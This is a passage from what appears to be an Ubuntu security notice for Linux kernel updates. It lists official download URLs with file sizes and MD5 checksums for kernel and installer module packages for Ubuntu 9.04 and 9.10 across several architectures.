http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   150964 dc4178cced6d9c1823d24b2204c15ae9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   184058 a25940b16b7022a52f7b8c78e164a908\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   157856 c628cef1c909819dab1fe2d812dffeba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    34500 2ea55d8e77aa3065af30ff4d440c059d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    78286 6d0f7704cdff848dbbfbd5fe60cf0ca7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    86190 c7d8ec25c3d35ea8455e9cf7c1b4ec64\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    51332 79b56b5e7f79a17d45fb7c55f64954b3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:     8796 e571105caa3bed5fc3576928b03eff31\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    64316 bcb0f12340567e9db7a5dcc3549dcf0e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   102092 a2556a5171c52abe48ba423b008c6f13\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:  1450234 339572f5e579468fc438b1dd2cc2dcd3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    44520 68267a8c684d01c673d4b41bf5d4af69\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    12642 80e228567fcb814cd67e54aec6abdb41\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   373158 483599df2e1b6c82a688b413b74e5b91\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   189720 156d822da222b7fc8b887a4d1b3b7c31\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    12992 7232aad22eb02ec694fa0d41d367a69c\n\nUpdated packages for Ubuntu 9.04:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.59.diff.gz\n      Size/MD5:  7350773 c09bf21927b9609694b39cdd55af21cf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.59.dsc\n      Size/MD5:     3198 5ba9f01bd70b951901d1d1667b964b54\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28.orig.tar.gz\n      Size/MD5: 66766084 062c29b626a55f09a65532538a6184d4\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.28_2.6.28-18.59_all.deb\n      Size/MD5:  3636694 05fda32db7067b32c0fe593e1acf0533\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18_2.6.28-18.59_all.deb\n      Size/MD5:  8701396 65f8df38ba832ad50c6486d22420efca\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.28_2.6.28-18.59_all.deb\n      Size/MD5: 56998214 3d33148ef29824c1060e1f66b470c6c4\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   234600 929bceffa24f85104c08edf073ac1f0e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    44110 6d94c9d8ecfe3b4673d25cce1db2b95b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    43316 d895b0ad91a70c9381fd7e17650fab75\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    51116 da4c61dc01f5b5e8fb61cdf14bbbb40a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    90082 dad217572b5b07064b9e12b0062d16b4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    38016 5e886058b306b4937f5a4ebe22451db6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   521628 d9f3ffe45b307847935002619ac31ea0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   125818 6fbc3c76a739b91e01da41bd535f3791\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    58060 cc30f23edae38f46b0d56f621969fd62\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   312502 9a11c9f0f37fee6a92c59de9df5fca11\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:  3872142 cdc4640244b192a5970dfc3d3efe4d7e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.59_amd64.deb\n      Size/MD5:   689228 bf7aedb2bbb365a73ed77a8976a2701e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.59_amd64.deb\n      Size/MD5:   689122 80cfc63043a2d7231f86ef3e68f0a131\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.59_amd64.deb\n      Size/MD5: 24344078 dca923a8044df0ba9c642d5f2b317867\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.59_amd64.deb\n      Size/MD5: 24335914 ad5a4fe70b4555e9399f9a45b58459f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.59_amd64.deb\n      Size/MD5: 10551276 b61ed90bb3d3f19f0d2e593c0e9f091a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_amd64.deb\n      Size/MD5:   766282 f86ee0c95591ea10b578e848b6fdeb5f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   215170 7939440a8813110d952d86b49113e146\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   189496 f7495840a58b11f4ebfaad4d8cf203fe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    29412 54845dbae313e98befcc172b5e87ac2c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   274480 e029f99b6550bd014f26c45997f76dcc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:  1933908 6fa450fb440effd7f4a1d643f5e80ab9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   163464 208a84b0506fcd9cadb25f1b7f9d26b7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   194828 596399bbfa9a92e3116c8f8d3a7d1391\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   152994 3cf4fb6614c5798cdcca7c8d7fd04a5b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    36486 b3cf4deb0dc4e11f095eb9bcf81546df\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:     5842 085134ad282a8b2580aa12a6ed64fd9e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    72152 5b6bf270db5279c7d79cbd5fca8e14f6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    22714 a01ded50b855c5ed0580072a2277b74a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:     8874 f173072403f51e6e6da399debd91068f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    47442 e822623d7e4ae0bec0ea5094fed67dcf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    15656 2b2e6ad08af592fa3106adb4eb16324e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:  1273594 d873a895c58da3fcd5b8a0ea91f9a5ee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    47204 c80f48bd49fddaae0188cf56350445f8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    72706 dcc76877eef3af00d0280f96cafb6e45\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:   126958 b184498c9d2a598d57e293bc09049cda\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb\n      Size/MD5:    13472 1399e0100a81d92448659b83949a62a6\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   215860 fe00a3406a5496e200d5c4e5975469f0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    46662 d7a61d1e363f9766795132d3325f02c4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    41352 7d84e783cf7fc4111eaf964395440369\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    47402 2cd024da2955f7e35fe4519c8df5add5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    86924 515a3a07357e06f49b2e4384e2af7b8c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    33578 452adbbc84f5a5218610ddad25eb3ea0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   525752 1a2c59458472f4a18538df9386396703\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   125654 8678d7c3409daf24a373b4d11a0d9263\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    54874 94d4465b06d14b20af5803f2afddf53d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   301338 64a58b9a7ee5d53c2d1a486fe32deb93\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:  3746292 099947b9ddfb625da14b96bf1b9f59e6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.59_i386.deb\n      Size/MD5:   673824 c36739d12d66db8de4b6e270b1c91464\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.59_i386.deb\n      Size/MD5:   676398 c7091523d59d0b1cdd4453e12d5983d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.59_i386.deb\n      Size/MD5: 24662186 cfa5f52488fb3767debfefaf8940f6b5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.59_i386.deb\n      Size/MD5: 24777004 b524e2b45df5e9d30ebc81717b5c62d7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.59_i386.deb\n      Size/MD5: 10250016 09b9af49da34304c1dd280896ce9c0cd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_i386.deb\n      Size/MD5:   766288 4858bc3941dc0e545195c0b911142a4c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   218106 f4f03360ad8e2ee23a58b534e8a2c045\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   174922 fbc6643612c01e91066a87b6ec9c7125\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    30064 c8e4db00aa9c0c3b75c47c103d87b4c5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   262814 794c683379e359de14db8806fe984f78\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:  2110070 da3e69dab278584e1abea5ee15d9b47d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   150230 7fc91b8ad535bfb705ba2cb2fc9ff57d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   184326 e505e555ac3bd0c33d00a47f7530f78c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   143584 209207f7e7887594a9d55d17bf1dca76\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    34576 cafc0f5f2db11f69d10e75815d3e9018\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:     5504 21cfbb5c1aa4c8d82bf3e1412646263f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    86018 0dc7720bee90887f4ebf5c71cf93d611\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    47636 fbebe71b83526192c08fd6d797ee8cb1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:     8714 14ed52e8c0a75151dd45acf3cb1ffc34\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    44692 27502a17d5ca35cc31a9fd79ae7d2f1d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    14780 2c9ea91e8d8da2bff76c38a6cdce748d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:  1445966 33fa2ee03c566924552fc5b413e2ccf1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    44098 f740dcb377a692e2ff25a65424431e5b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    69290 a7e3130530005bf8fe4edabe8b003888\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:   119528 a12c1a5bf9a112402d80e8f77ee87a1c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb\n      Size/MD5:    12678 6646096dee2575f3bb33510e70bdd52b\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   215260 9a096eefa7f5e423c60fea41c314b9a5\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    46664 ba3b534d98d6717395ec66b402b3c701\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    40958 5950f34ca1fbd16f82a42020bc934ec6\n    http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    47312 0d7d48294720bbd387710d560756ce6a\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    86530 9e5c38cd42496250d5fcf951c6b5d4bd\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    33272 a8890faa31cf92122bcce2991374fe7e\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   523810 7b2a58ca4d024926c0f8101ab49242d6\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   125252 f48299cd45e2ef1a74017d1c7653976e\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    63568 135fe854fe31d2d8bd9cd09f40a266e5\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   300756 77668125ff976eaed45f3d2676a46c5f\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:  3035296 186cc64995c4fd4404241de5399eb0fb\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.28-18-lpia_2.6.28-18.59_lpia.deb\n      Size/MD5:   641460 1a4d29b73378acb8bcf88658f88dd08e\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.28-18-lpia_2.6.28-18.59_lpia.deb\n      Size/MD5: 21796372 d7455e818bf972ef7eb0fe54b7bd96dc\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_lpia.deb\n      Size/MD5:   766260 b67d9c1432185123449ed6826ed9588d\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   303982 80fe6dcf6d68a46047ef6ddc2c098614\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   157406 2cc8f76d83482452bb6073656a80b2ee\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    24442 28180da41edae2700e4c8a0e4f1c656f\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   260414 49a0b6bd418a0ff1d274ce8f602e2733\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:  2027576 241ee9a564502f3d8837806d5e6480d0\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   149398 b14f79b842c979418dec65e273836cd0\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   184736 a159624d12831598d35c3b00ba563182\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   143238 2720ae4f8cdad85066fc888e7fc3c796\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    34462 582363a3843fdbded2476793775ace76\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:     5496 67c7245d730a7b241eb9947afeef7669\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    85646 6a31ffe0054c27df1506ae34162ab79e\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    47402 ff41a000c4a3abbed18330e905a01b7b\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:     8718 15aa2d8fafced6b6e3b5a24c698b4089\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    63106 7a967940a04c1ee6a9626258e608b54c\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    14720 dc899d8630769d6270526c49f99a2af8\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:  1447832 400eeba1e83569d777954b21b6df593c\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:    43898 16b0a1310e3f70dccfc8d0d5f971b064\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   155186 b22b41e37f88fe49531f5580e0f7f712\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:   172666 df244ff125096be469b1c56a30f1e05f\n    http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb\n      Size/MD5:     8154 f2d765541e008431b4d3eae00f435b61\n\nUpdated packages for Ubuntu 9.10:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-304.10.dsc\n      Size/MD5:     2450 610bb83247876f8a8b47a0fd0d46fae8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-304.10.tar.gz\n      Size/MD5: 87052080 62b9dcb9ad24e659db1aa085f9e5a456\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-108.21.dsc\n      Size/MD5:     1906 a39c7ff46fb3ff74480d0e98366a486d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-108.21.tar.gz\n      Size/MD5: 81902928 c9e88b4f386710c3f22979986a7e3a34\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-211.22.dsc\n      Size/MD5:     1943 25176b20de251c2e58bb95e2dd9c1c7b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-211.22.tar.gz\n      Size/MD5: 82470873 4d5238d3d11105852133d3eb802a95cc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-19.56.diff.gz\n      Size/MD5:  2811600 b2b44f12a786758d470e6a29c09d0388\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-19.56.dsc\n      Size/MD5:     3782 ae6bf5844769d00004b919a6f61d588c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31.orig.tar.gz\n      Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-doc_2.6.31-304.10_all.deb\n      Size/MD5:  3790328 e35ab5c36ee1bac625d2a57bd19e0c5c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-source-2.6.31_2.6.31-304.10_all.deb\n      Size/MD5: 64258256 70b947cc9e9012c9472f2c317f11ffae\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304_2.6.31-304.10_all.deb\n      Size/MD5:  9662096 ac58cebef695901ea01bc7413b79109f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.31-19.56_all.deb\n      Size/MD5:  3791668 3836f273873fedf9d2293ee0d11df6ce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19_2.6.31-19.56_all.deb\n      Size/MD5:  9531414 34d882276f33b0e37135c379a6e1c451\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.31_2.6.31-19.56_all.deb\n      Size/MD5: 62161518 9d3f3f79b9f14db8bd3dc68594eb8c8c\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304-ec2_2.6.31-304.10_amd64.deb\n      Size/MD5:   603212 951db7e930eefc5fff9017c56badfb6e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-304-ec2_2.6.31-304.10_amd64.deb\n      Size/MD5: 18660056 e39dda7f87b093e927c34a928b842c7a\n    